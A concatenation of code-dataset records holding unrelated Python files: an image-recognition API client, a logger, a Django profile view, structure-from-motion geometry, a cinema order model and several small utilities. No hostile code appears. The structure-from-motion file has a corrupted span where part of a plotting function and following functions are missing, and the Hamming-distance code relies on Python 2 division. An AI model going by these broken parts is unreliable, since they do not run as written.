@api_call(error.InvalidQueryError)\n def get_video_results(self, video_id, threshold=1, response_format='json'):\n \"\"\"\n Get the current classifications for a given video ID\n\n video_id: a unique id for the classified video\n threshold: the cutoff for confidence level in the detection at each timestamp\n response_format: 'csv' or 'json' for the response format\n \"\"\"\n (endpoint, method) = self.endpoints['get_video_results']\n\n if response_format == 'csv' and self.json_format:\n print('cannot return csv format when json_format True is specified upon API object initialization')\n print('requesting JSON format...')\n response_format = 'json'\n\n endpoint = endpoint.replace(':key', video_id)\n\n try:\n headers = {'Authorization': self.token.authorization_header()}\n params = {'videoId': video_id, 'threshold': threshold, 'format': response_format}\n return requests.request(method, endpoint, **{'headers': headers, 'params': params})\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n @api_call(error.InvalidQueryError)\n def create_detector(self, zip_file, name, detector_type):\n \"\"\"\n Create a new detector 
with the contents of the zip file\n\n detector_type: general, facial_recognition, or facial_characteristics\n name: the detector's display name\n zip_file: a zip file containing the images to be used in the detector creation\n the root folder should contain only directories which will become the labels for detection\n each of these directories should contain only images corresponding to that label.\n\n However, there is an exception if you want to add negative examples to a label.\n In that case, put the negative images for the label in a folder called \"negative\" inside the corresponding label.\n\n To include bounding boxes, include one file called bbox.csv in the top level directory.\n Each line of this file should be formatted as follows:\n 0.25, 0.3, 0.75, 0.8, cat, positive, image.jpg\n 0.25, 0.4, 0.55, 0.7, dog, positive, picture.jpg\n 0.0, 0.1, 0.2, 0.3, cat, negative, raccoon.jpg\n\n Column definitions:\n top left X coordinate, top left Y coordinate, bottom right X coordinate, bottom right Y coordinate, label, positive or negative example, file name\n\n Max 300 MB zip file upload\n\n structure example:\n cat/\n garfield.jpg\n nermal.png\n dog/\n odie.TIFF\n negative/\n lobo.jpg\n bbox.csv\n \"\"\"\n MAX_LOCAL_ZIP_SIZE = 300 * 1024 * 1024\n\n (endpoint, method) = self.endpoints['create_detector']\n\n try:\n headers = {'Authorization': self.token.authorization_header()}\n data = {'name': name, 'detector_type': detector_type}\n with self.filereader.get_file(zip_file) as file_to_upload:\n files = {'file': file_to_upload}\n file_size = os.fstat(file_to_upload.fileno()).st_size\n\n if file_size > MAX_LOCAL_ZIP_SIZE:\n raise error.InvalidQueryError(message='File %s is larger than the limit of %d megabytes' % (file_to_upload.name, self.bytes_to_mb(MAX_LOCAL_ZIP_SIZE)))\n\n return requests.request(method, endpoint, **{'headers': headers, 'files': files, 'data': data})\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n @api_call(error.InvalidQueryError)\n def train_detector(self, detector_id, name=None, detector_type=None):\n \"\"\"Begin training the detector\"\"\"\n (endpoint, method) = self.endpoints['train_detector']\n\n endpoint = endpoint.replace(':key', detector_id)\n\n try:\n headers = {'Authorization': self.token.authorization_header()}\n data = {}\n if name:\n data['name'] = name\n if detector_type:\n data['detector_type'] = detector_type\n\n return requests.request(method, endpoint, **{'headers': headers, 'data': data})\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n @api_call(error.InvalidQueryError)\n def detector_info(self, detector_id):\n \"\"\"Get information about detector\"\"\"\n (endpoint, method) = self.endpoints['detector_info']\n\n endpoint = endpoint.replace(':key', detector_id)\n\n try:\n headers = {'Authorization': self.token.authorization_header()}\n return requests.request(method, endpoint, **{'headers': headers})\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n @api_call(error.InvalidQueryError)\n def register_stream(self, stream_url, stream_name):\n (endpoint, method) = self.endpoints['register_stream']\n\n try:\n headers = { 'Authorization': self.token.authorization_header() }\n data = {\n 'name': stream_name,\n 'url': stream_url\n }\n return requests.request(method, endpoint, **{'headers': headers, 'data': data})\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n @api_call(error.InvalidQueryError)\n def monitor_stream(self, stream_id, detector_id, **options):\n 
(endpoint, method) = self.endpoints['monitor_stream']\n endpoint = endpoint.replace(':detector_id', detector_id)\n endpoint = endpoint.replace(':stream_id', stream_id)\n\n try:\n headers = { 'Authorization': self.token.authorization_header() }\n data = {\n 'thresholds': options.get('thresholds'),\n 'startTime': options.get('start_time'),\n 'endTime': options.get('end_time'),\n 'endpoint': options.get('endpoint')\n }\n return requests.request(method, endpoint, **{'headers': headers, 'data': data})\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n @api_call(error.InvalidQueryError)\n def account_info(self):\n \"\"\"Get user account and credits information\"\"\"\n (endpoint, method) = self.endpoints['account_info']\n\n try:\n headers = {'Authorization': self.token.authorization_header()}\n return requests.request(method, endpoint, **{'headers': headers})\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n # -----------------------------------------------------------------\n # Helper methods and helper classes\n # -----------------------------------------------------------------\n\n def bytes_to_mb(self, bytes):\n return bytes / 1024 / 1024\n\n def check_errors(self, response=None, UserErr=None):\n \"\"\"Raise specific errors depending on how the API call failed\"\"\"\n status = response.status_code\n code = None\n try:\n code = response.json().get('code')\n except:\n pass\n\n if status == 429 and code == 'rate_err':\n raise error.RateLimitError(response)\n elif status == 402 and code == 'payment_err':\n raise error.PaymentError(response)\n elif status // 100 == 4: # integer division, so e.g. 404 maps to 4 under Python 3 as well\n if code == 'token_expiration_err':\n raise error.TokenExpirationError(response)\n elif UserErr:\n raise UserErr(response)\n else:\n raise error.APIError(response)\n elif code == 'media_err':\n raise error.MediaError(response)\n elif status // 100 == 5 and code == 'server_err':\n raise error.ServerError(response)\n elif status // 100 != 2:\n raise error.APIError(response)\n\n def format_response(self, response):\n \"\"\"Format the output according to the options (json, print to screen)\"\"\"\n if self.print_output:\n print(response.text)\n if self.json_format:\n return response.json()\n else:\n return response.text\n\n def save_token(self, response):\n \"\"\"Extracts the access token from the API response\"\"\"\n res = response.json()\n\n if isinstance(res, str):\n print(response.text)\n raise error.APIError(message='Could not parse the response')\n\n access_token = res['access_token']\n token_type = res['token_type']\n expires_in = res['expires_in']\n\n if not access_token or not token_type or not expires_in:\n raise error.APIError(\n message='Required parameters not found in the response')\n\n self.token = self.Token(token_type, access_token, expires_in)\n\n class Token(object):\n \"\"\"Represents an OAuth access token\"\"\"\n\n def __init__(self, token_type, token_str, expiration):\n self.token_type = token_type\n self.token_str = token_str\n self.born = datetime.datetime.now()\n self.lifetime = expiration\n\n def authorization_header(self):\n return self.token_type + \" \" + self.token_str\n\n def expired(self):\n return self.born + datetime.timedelta(0, int(self.lifetime)) < datetime.datetime.now()\n\n class FileReader(object):\n \"\"\"Reads files for classification input\"\"\"\n\n def __init__(self):\n pass\n\n def get_file(self, file_input):\n \"\"\"Extracts file from file path or returns the file if file is passed in\"\"\"\n local_file = file_input\n if isinstance(file_input, str):\n 
local_file = open(file_input, 'rb')\n\n return local_file\n\nMatroid = MatroidAPI\n","sub_path":"matroid/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":18460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
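A minimal usage sketch for the client above. The credential and detector id values are placeholders; as the constructor shows, the MATROID_CLIENT_ID and MATROID_CLIENT_SECRET environment variables are used when the arguments are omitted.

from matroid.client import Matroid

api = Matroid(client_id="<public-key>", client_secret="<private-key>")
detectors = api.list_detectors()  # the @api_call decorator fetches/refreshes the token first
result = api.classify_image("<detector-id>", image_url="https://example.com/cat.jpg")
print(result)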
+{"seq_id":"172800301","text":"import logging\nimport logging.handlers\nimport sys\nimport os\nLOGGER_NAME = 'api-logger'\nDEBUG = \\\n os.getenv(\"ENVIRONMENT\") == \"development\" \\\n or os.getenv(\"ENVIRONMENT\") == \"local\" \\\n or os.getenv(\"ENVIRONMENT\") is None \\\n or os.getenv(\"DEBUG_LOGS\") == \"true\"\n\n\nclass LogWrapper:\n def __init__(self, name):\n self.logger = logging.getLogger(LOGGER_NAME)\n self.logger.setLevel(logging.DEBUG)\n # create file handler which logs even debug messages in prod\n fh = logging.handlers.RotatingFileHandler('api_logger.log', maxBytes=500240, backupCount=5)\n fh.setLevel(logging.DEBUG)\n\n # create console handler with a higher log level\n ch = logging.StreamHandler(stream=sys.stdout)\n\n if DEBUG:\n ch.setLevel(logging.DEBUG)\n else:\n ch.setLevel(logging.INFO)\n\n # create formatter and add it to the handlers\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n\n # add the handlers to the logger\n self.logger.addHandler(fh)\n self.logger.addHandler(ch)\n self.name = name\n\n def debug(self, msg):\n self.log('debug', msg)\n\n def info(self, msg):\n self.log('info', msg)\n\n def warning(self, msg):\n self.log('warning', msg)\n\n def warn(self, msg):\n self.log('warning', msg)\n\n def error(self, msg):\n self.log('error', msg)\n\n def critical(self, msg):\n self.log('critical', msg)\n\n def log(self, *params):\n log_levels = {\n \"critical\": 50,\n \"error\": 40,\n \"warning\": 30,\n \"info\": 20,\n \"debug\": 10,\n \"notset\": 0\n }\n\n incoming_level = log_levels[params[0]]\n msg = f\"({params[0]} @ {self.name}) {params[1]}\"\n # print(\"****\", msg, incoming_level)\n self.logger.log(incoming_level, msg)\n","sub_path":"src/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"96262413","text":"\"\"\"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nClass for holding the data of a root of a Coxeter group\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\"\"\"\n\n\nclass Root(object):\n def __init__(self, coords=(), index=None, mat=None):\n \"\"\"\n :param coords : coefficients of this root as a linear combination of simple roots.\n :param index : an integer, the index of this root.\n :param mat: matrix of the reflection of this root.\n \"\"\"\n self.coords = coords\n self.index = index\n self.mat = mat\n # reflection by simple roots: {s_i(α), i=0, 1, ...}\n self.reflections = [None] * len(self.coords)\n\n def __eq__(self, other):\n \"\"\"\n Check if two roots are equal, assume they are in the same root system.\n \"\"\"\n if isinstance(other, Root):\n return all(self.coords == other.coords)\n return False\n","sub_path":"src/uniform-tilings/coxeter/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"278980192","text":"\n# coding: utf-8\n\n# In[1]:\n\nfrom __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport PIL.Image as Image\n\n\n# In[ ]:\n\n\n\n\n# In[2]:\n\ndef compute_fundamental(x1, x2):\n \"\"\" Compute the fundamental matrix from corresponding points\n (x1,x2 3*n arrays) using the normalized 8 point algorithm.\n each row is constructed as \n [x'*x, x'*y, x', y'*x, y'*y, y', x,y,1] <-w는 1이니까. \"\"\"\n \n n =x1.shape[1]\n if x2.shape[1] !=n:\n raise ValueError(\"Number of points don't match. \")\n \n # build matrix for equations\n A = np.zeros((n,9)) # x1 = [[x,x,x,...],[y,y,y,....],[w,w,w,....]]\n for i in range(n):\n A[i]= [x1[0,i]*x2[0,i], x1 [0,i]*x2[1,i], x1 [0,i]*x2[2,i],\n x1[1,i]*x2[0,i], x1 [1,i]*x2[1,i], x1 [1,i]*x2[2,i], \n x1[2,i]*x2[0,i], x1 [2,i]*x2[1,i], x1 [2,i]*x2[2,i] ]\n \n #compute linear least square solution\n U, S, V = np.linalg.svd(A)\n F = V[-1].reshape(3,3)\n \n # constrain F\n # make rank 2 by zeroing out las singular value\n U, S, V = np.linalg.svd(F) # 원래 F의 랭크는 2니까. 이런식으로 만들수있음.\n S[2] = 0\n F = np.dot(U, np.dot(np.diag(S),V))\n \n return F\n\n\n# In[3]:\n\ndef compute_epipole(F):\n \"\"\" Compute the (right) epipole from a \n fundamental matrix F.\n (Use with F.T for left epipole.) \"\"\"\n \n # return null space of F (Fx=0)\n U,S,V = np.linalg.svd(F)\n e = V[-1]\n return e/e[2]\n \"\"\"If you want the epipole corresponding to the left null vector \n (corresponding to the epipole in the other image), \n just transpose F before passing it as input.\"\"\"\n\n\n# In[4]:\n\ndef plot_epipolar_line(im, F, x, epipole=None, show_epipole=True):\n \"\"\" Plot the epipole and epipolar line F*x=0\n in an image. F is the fundamental matrix\n and x a point in the other image. \"\"\"\n # F 랑 다른 이미지에서의 포인트좌표를 가지고 epipolar line을 만들수 있음\n \n m,n = im.shape[:2] # 이미지의 가로,세로 구함\n line = np.dot(F,x) # l1 ~ Fx2\n \n # epipolar line parameter and values\n # 이쪽 부분은 잘 모르겠음. 그림 그리려고 전처리 하는거 같긴한데..\n t = np.linspace(0,n,100)\n lt = np.array([(line[2]+line[0]*tt)/(-line[1]) for tt in t])\n \n # take only line points inside the image \n # 이미지 범위를 넘어가는 선은 걍 안보여줌\n ndx = (lt>=0) & (lt P형태로 만들고 있음.\n\n\n# In[11]:\n\ndef compute_P_from_fundamental(F):\n \"\"\" Compute the second camera matrix (assuming P1 = [ i | 0 ])\n from a fundamental matrix. \"\"\"\n \n e = compute_epipole(F.T) # left epipole이라서 T해준거임. 오른쪽은 그냥 보내주면됨.\n Te = skew(e)\n return np.vstack( (np.dot(Te, F.T).T, e)).T # left라서 F.T가 들어간거 같긴한데.. 잘 몰겠음.\n\n\n# In[12]:\n\ndef skew(a):\n \"\"\" Skew matrix A such that a x v = Av for any v. \"\"\"\n \n return np.array([[0, -a[2], a[1]], [a[2], 0, -a[0]], [-a[1], a[0], 0]])\n\n\n# In[13]:\n\ndef compute_P_from_essential(E):\n \"\"\" Computes the second camera matrix (assuming P1 = [i | 0])\n from an essential matrix. Output is a list of four\n possible camera matrics. 
\"\"\"\n \n # make sure E is rank 2\n U, S, V = np.linalg.svd(E)\n if np.linalg.det(np.dot(U,V))<0 :\n V = -V\n E = np.dot(U, np.dot(np.diag([1,1,0]),V) ) # 지금 S가 1,1로 들어가니까 이상함.\n \n # create matrices (Hartley p 258)\n Z = skew([0,0,-1])\n W = np.array([[0,-1,0],[1,0,0],[0,0,1]]) # hartley matrix의 모양을 만들려고 이러는듯?\n \n # return all four solutions\n P2 = [np.vstack((np.dot(U, np.dot(W,V)).T, U[:,2])).T,\n np.vstack((np.dot(U,np.dot(W,V)).T,-U[:,2])).T,\n np.vstack((np.dot(U,np.dot(W.T,V)).T,U[:,2])).T, \n np.vstack((np.dot(U,np.dot(W.T,V)).T,-U[:,2])).T] # 4개중 어떤게 맞는건지는 나중에 살펴봄.\n\n return P2\n \n\n\n# In[14]:\n\nclass RansacModel(object):\n \"\"\" Class for fundamental matrix fit with ransac.py from\n http://www.scipy.org/Cookbook/RANSAC\"\"\"\n \n def __init__(self, debug=False):\n self.debug = debug\n \n def fit(self, data):\n \"\"\" Estimate fundamental matrix using eight\n selected correspondences. \"\"\" # 들어오는 data형태는 n x 3 형태로 받음. 3은 (x,y,w=1)를 뜻함\n \n # transpose and split data into the two point sets\n data = data.T\n x1 = data[:3, :8] # 8포인트 알고리즘을 쓸거라서 8개의 대응점이 필요한거임 이건 1-view에서의 대응점에 위치한 image좌표\n x2 = data[3:, :8] # 2-view...\n \n # estimate fundamental matrix and return\n F = compute_fundamental_normalized(x1,x2)\n return F\n \n def get_error(self, data, F):\n \"\"\" Compute x.T F x for all correspondences,\n return error for each transformed point. \n 여기서 에러값의 추정치는 sampson distance 라는 measure를 썼음..\"\"\" \n \n # transpose and split data into the two point\n data = data.T\n x1 = data[:3]\n x2 = data[3:]\n \n # Sampsom distance as error measure\n Fx1 = np.dot(F,x1)\n Fx2 = np.dot(F,x2)\n denom = Fx1[0]**2 + Fx1[1]**2 + Fx2[0]**2 + Fx2[1]**2\n err = (np.diag(np.dot(x1.T, np.dot(F,x2))) )**2 / denom \n \n # return error per point\n return err\n\n\n# In[41]:\n\ndef compute_fundamental_normalized(x1,x2):\n \"\"\" Computes the fundamental matrix from corresponding points\n (x1, x2 3*n arrays) using the normalized 8 point algorithm.\"\"\"\n \n n = x1.shape[1]\n if x2.shape[1] != n:\n raise ValueError(\"Number of points don't match.\")\n \n # normalize image coordinates\n x1 = x1 / x1[2]\n mean_1 = np.mean(x1[:2], axis=1) # axis=1 가로로 평균. 즉, Mean_1 = ([x_bar, y_bar])\n S1 = np.sqrt(2) / np.std(x1[:2]) # x1[:2] -> x들과 y들만 뽑음. 근데 np.std(x1[:2])는 x들이랑y들이랑 다 같은 차원으로 보고 std를 구함.\n T1 = np.array([[S1, 0, -S1*mean_1[0]],[0, S1, -S1*mean_1[1]], [0, 0, 1] ])\n x1 = np.dot(T1,x1)\n \n x2 = x2 / x2[2]\n mean_2 = np.mean(x2[:2], axis=1) # axis=1 가로로 평균. 즉, Mean_2 = ([x_bar, y_bar])\n S2 = np.sqrt(2) / np.std(x2[:2]) # x2[:2] -> x들과 y들만 뽑음. 근데 np.std(x2[:2])는 x���이랑y들이랑 다 같은 차원으로 보고 std를 구함.\n T2 = np.array([[S2, 0, -S2*mean_2[0]],[0, S2, -S2*mean_2[1]], [0, 0, 1] ])\n x2 = np.dot(T2,x2)\n \n # compute F with the normalized coordinates\n F = compute_fundamental(x1,x2)\n \n # reverse normalization \n F = np.dot(T1.T, np.dot(F,T2)) # 위에서 노말라이제이션으로 x1,x2를 바꿔서 F를 구한거니까, 다시 denormalization을 해줘야함.\n \n return F/F[2,2] # 노이즈를 없애준거라 생각하면됨.\n\n\n# In[42]:\n\ndef F_from_ransac(x1, x2, model, maxiter=5000, match_theshold=1e-6):\n \"\"\" Robust estimation of a fundamental matrix F from point\n correspondences using RANSAC (ransac.py from\n http://www.scipy.org/Cookbook/RANSAC). \n \n input: x1, x2 (3*n arrays) points in hom. coordinates. 
\"\"\"\n \n import ransac\n \n data = np.vstack( (x1,x2))\n \n # compute F and return with lnlier index\n F, ransac_data = ransac.ransac(data.T, model, 8, maxiter, match_theshold, 20, return_all=True)\n return F, ransac_data['inliers']\n \n \n\n\n# In[ ]:\n\n\n\n","sub_path":"ch5/sfm.py","file_name":"sfm.py","file_ext":"py","file_size_in_byte":9335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"8430871","text":"from django.shortcuts import render, get_object_or_404\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom checkout.models import Order\nfrom .models import UserAccount\nfrom .forms import UserAccountForm\n\n\n@login_required\ndef user_account(request):\n \"\"\" display users profile \"\"\"\n account = get_object_or_404(UserAccount, user=request.user)\n\n if request.method == \"POST\":\n form = UserAccountForm(request.POST, instance=account)\n if form.is_valid():\n form.save()\n messages.success(request, 'Profile updated successfully')\n else:\n messages.error(request, 'Update failed')\n else:\n form = UserAccountForm(instance=account)\n orders = account.orders.order_by('-date').all\n\n context = {\n 'form': form,\n 'orders': orders,\n 'on_account': True\n }\n\n return render(request, 'profile/profile.html', context)\n\n\n@login_required\ndef order_history(request, order_number):\n \"\"\" Displays the order history for the current user \"\"\"\n order = get_object_or_404(Order, order_number=order_number)\n\n messages.info(request, (\n f'This is a past order for order {order_number}.'\n ))\n context = {\n 'order': order,\n 'history': True,\n }\n\n return render(request, 'checkout/checkout_success.html', context)\n","sub_path":"profile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"509824856","text":"import numpy as np\nimport pandas as pd\nimport random\n\ndef puzzleBoardSetup(puzzle):\n puzzle = str(puzzle)\n puzzleList = []\n alphabet = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n for let in puzzle:\n if let in alphabet:\n puzzleList.append(\"_ \")\n elif let == \" \":\n puzzleList.append(\" \")\n else:\n puzzleList.append(let + \" \")\n\n puzzleString = \"\"\n for let in puzzleList:\n puzzleString += let\n\n return puzzleString\n\ndef letValid(guessedList, let):\n\n alphabet = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n\n if let == \"quit\":\n return \"quit\"\n elif len(let) != 1:\n print(\"please guess only 1 letter\")\n elif let.upper() not in alphabet:\n print(\"please guess a letter\")\n elif let.upper() in guessedList:\n print(\"you've already guessed that, guess again\")\n else:\n return let.upper()\n\ndef checkLet(let, puzzleTest, puzzleSol):\n\n puzzleList = []\n\n for i in range(len(puzzleSol)):\n if let == puzzleSol[i]:\n puzzleList.append(puzzleSol[i])\n else:\n puzzleList.append(puzzleTest[i])\n\n puzzleTest = \"\"\n for i in puzzleList:\n puzzleTest += i\n\n return puzzleTest\n\ndef checkGameOver(puzzleTest, puzzleSol):\n if puzzleTest == puzzleSol:\n return True\n\n return False\n\ndef setSolution(puzzleSol):\n puzzle = str(puzzleSol)\n puzzleList = []\n alphabet = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n for let in puzzle:\n if let in alphabet:\n puzzleList.append(let + \" \")\n elif let == \" \":\n puzzleList.append(\" \")\n else:\n puzzleList.append(let + \" \")\n\n puzzleString = \"\"\n for let in puzzleList:\n puzzleString += let\n\n return puzzleString\n","sub_path":"wheel_of_fortune_functions.py","file_name":"wheel_of_fortune_functions.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"437645112","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# author:owefsad\n# software: PyCharm\n# project: lingzhi-webapi\nimport time\n\nfrom dongtai.endpoint import UserEndPoint, R\nfrom dongtai.models.hook_strategy import HookStrategy\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass EngineHookRuleModifyEndPoint(UserEndPoint):\n def parse_args(self, request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n try:\n rule_id = request.data.get('rule_id')\n rule_type = request.data.get('rule_type_id')\n rule_value = request.data.get('rule_value').strip()\n rule_source = request.data.get('rule_source').strip()\n rule_target = request.data.get('rule_target').strip()\n inherit = request.data.get('inherit').strip()\n is_track = request.data.get('track').strip()\n\n return rule_id, rule_type, rule_value, rule_source, rule_target, inherit, is_track\n except Exception as e:\n return None, None, None, None, None, None, None\n\n def post(self, request):\n rule_id, rule_type, rule_value, rule_source, rule_target, inherit, is_track = self.parse_args(request)\n if all((rule_id, rule_type, rule_value, rule_source, inherit, is_track)) is False:\n return R.failure(msg=_('Incomplete parameter, please check again'))\n\n strategy = HookStrategy.objects.filter(id=rule_id, created_by=request.user.id).first()\n\n if strategy:\n strategy.value = rule_value\n strategy.source = rule_source\n strategy.target = rule_target\n strategy.inherit = inherit\n strategy.track = is_track\n strategy.update_time = int(time.time())\n strategy.save()\n\n return R.success(msg=_('Strategy has been created successfully'))\n return R.failure(msg=_('Failed to create strategy'))\n","sub_path":"iast/views/engine_hook_rule_modify.py","file_name":"engine_hook_rule_modify.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"385391940","text":"from five import grok\nfrom zope.component import queryUtility\nfrom zope.component.hooks import getSite\n\nfrom plone.registry.interfaces import IRegistry\nfrom plone.app.controlpanel.interfaces import IConfigurationChangedEvent\n\nfrom Products.CMFCore.utils import getToolByName\n\nfrom maxclient import MaxClient\nfrom mrs.max.browser.controlpanel import IMAXUISettings\n\n\n@grok.subscribe(IConfigurationChangedEvent)\ndef updateMAXUserInfo(event):\n \"\"\"This subscriber will trigger when a user change his/her profile data.\"\"\"\n\n # Only execute if the event triggers on user profile data change\n if 'fullname' in event.data:\n site = getSite()\n pm = getToolByName(site, \"portal_membership\")\n if pm.isAnonymousUser(): # the user has not logged in\n username = ''\n return\n else:\n member = pm.getAuthenticatedMember()\n\n username = member.getUserName()\n memberdata = pm.getMemberById(username)\n properties = dict(displayName=memberdata.getProperty('fullname', ''),\n twitterUsername=memberdata.getProperty('twitter_username', '')\n )\n\n registry = queryUtility(IRegistry)\n settings = registry.forInterface(IMAXUISettings, check=False)\n effective_grant_type = settings.oauth_grant_type\n oauth_token = memberdata.getProperty('oauth_token', '')\n\n maxclient = MaxClient(url=settings.max_server, oauth_server=settings.oauth_server, grant_type=effective_grant_type)\n maxclient.setActor(username)\n maxclient.setToken(oauth_token)\n\n maxclient.modifyUser(username, properties)\n","sub_path":"mrs/max/subscribers.py","file_name":"subscribers.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"169994910","text":"import datetime\n\nfrom apps.cinemas.models import Cinema, Hall, HallScheduling, SeatScheduling, Seats\nfrom apps.ext import db\nfrom apps.main.models import Movie\n\n\nclass Order(db.Model):\n id = db.Column(db.Integer, autoincrement=True, primary_key=True)\n # 订单号\n no = db.Column(db.String(50), unique=True, index=True, nullable=False)\n movie_id = db.Column(db.Integer, db.ForeignKey(Movie.id), nullable=False)\n cinema_id = db.Column(db.Integer, db.ForeignKey(Cinema.cid), nullable=False)\n hs_id = db.Column(db.Integer, db.ForeignKey(HallScheduling.hsid))\n ss_id = db.Column(db.Integer, db.ForeignKey(SeatScheduling.id))\n seat_id = db.Column(db.Integer, db.ForeignKey(Seats.sid))\n # 票数\n number = db.Column(db.Integer, nullable=False)\n # 取票码\n ticket_code = db.Column(db.String(100))\n # 总金额\n total = db.Column(db.Numeric(7, 2))\n #创建的时间\n create_date = db.Column(db.DateTime, default=datetime.datetime.now())\n pay_date = db.Column(db.DateTime)\n # 1 表示未支付 2 已支付, 3 表示支付已取票 4 表示支付未取票 5 退票\n status = db.Column(db.SmallInteger, nullable=False)\n # 有效期\n out_time = db.Column(db.DateTime, default=datetime.datetime.now()+datetime.timedelta(minutes=15))\n is_delete = db.Column(db.Boolean, default=False)\n","sub_path":"apps/order/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"208694217","text":"'''\nThe Hamming distance between two integers is the number of positions at which the corresponding bits are different.\n\nGiven two integers x and y, calculate the Hamming distance.\n'''\n\nclass Solution(object):\n def hammingDistance(self, x, y):\n \"\"\"\n :type x: int\n :type y: int\n :rtype: int\n \"\"\"\n res = x ^ y # gives all bits that are different\n count = 0\n while res > 0:\n if res & 1:\n count += 1\n res = res/2\n\n return count\n","sub_path":"problems/math/hammingDistance.py","file_name":"hammingDistance.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"482583176","text":"\"\"\"\nDownloads the following:\n- Stanford CoreNLP\n- Stanford Shift-Reduce Constituency Parser\n- MongoDB Java Driver\n- Glove vectors\n- Word2Vec vectors\n- FastText vectors\n\n\"\"\"\n\nimport argparse\nimport os\nimport shutil\nfrom pathlib import Path\n\nfrom definitions import ROOT_DIR\nfrom syn.helpers.download import download, download_and_extract, download_gensim_vectors\nfrom syn.helpers.logging import set_logger\n\n# Defines logger.\nlog = set_logger()\n\n\ndef get_input_params():\n parser = argparse.ArgumentParser(\n description='Download Stanford CoreNLP and Stanford Shift-Reduce Constituency Parser libraries, '\n 'MongoDB Java Driver and Glove vectors'\n )\n # download_corenlp\n parser.add_argument(\n '--download_corenlp',\n default=True,\n dest='download_corenlp',\n action='store_true',\n help=\"Download Stanford CoreNLP library.\"\n )\n # no_download_corenlp\n parser.add_argument(\n '--no_download_corenlp',\n dest='download_corenlp',\n action='store_false',\n help=\"Don't download Stanford CoreNLP library..\"\n )\n # download_srparser\n parser.add_argument(\n '--download_srparser',\n default=True,\n dest='download_srparser',\n action='store_true',\n help=\"Download Stanford Shift-Reduce Constituency Parser library.\"\n )\n # no_download_srparser\n parser.add_argument(\n '--no_download_srparser',\n dest='download_srparser',\n action='store_false',\n help=\"Don't download Stanford Shift-Reduce Constituency Parser library.\"\n )\n # download_mongodb\n parser.add_argument(\n '--download_mongodb',\n default=True,\n dest='download_mongodb',\n action='store_true',\n help=\"Download MongoDB Java Driver.\"\n )\n # no_download_mongodb\n parser.add_argument(\n '--no_download_mongodb',\n dest='download_mongodb',\n action='store_false',\n help=\"Don't download MongoDB Java Driver.\"\n )\n # download_glove\n parser.add_argument(\n '--download_glove',\n default=True,\n dest='download_glove',\n action='store_true',\n help=\"Download Glove vectors.\"\n )\n # no_download_glove\n parser.add_argument(\n '--no_download_glove',\n dest='download_glove',\n action='store_false',\n help=\"Don't download Glove vectors.\"\n )\n # download_word2vec\n parser.add_argument(\n '--download_word2vec',\n default=True,\n dest='download_word2vec',\n action='store_true',\n help=\"Download Word2Vec vectors.\"\n )\n # no_download_word2vec\n parser.add_argument(\n '--no_download_word2vec',\n dest='download_word2vec',\n action='store_false',\n help=\"Don't download Word2Vec vectors.\"\n )\n # download_fasttext\n parser.add_argument(\n '--download_fasttext',\n default=True,\n dest='download_fasttext',\n action='store_true',\n help=\"Download Glove vectors.\"\n )\n # no_download_fasttext\n parser.add_argument(\n '--no_download_fasttext',\n dest='download_fasttext',\n action='store_false',\n help=\"Don't download Fasttext vectors.\"\n )\n args = parser.parse_args()\n\n return {\n 'download_corenlp': args.download_corenlp,\n 'download_srparser': args.download_srparser,\n 'download_mongodb': args.download_mongodb,\n 'download_glove': args.download_glove,\n 'download_word2vec': args.download_word2vec,\n 'download_fasttext': args.download_fasttext\n }\n\n\nif __name__ == '__main__':\n # Input parameters.\n input_params = get_input_params()\n\n base_dir = 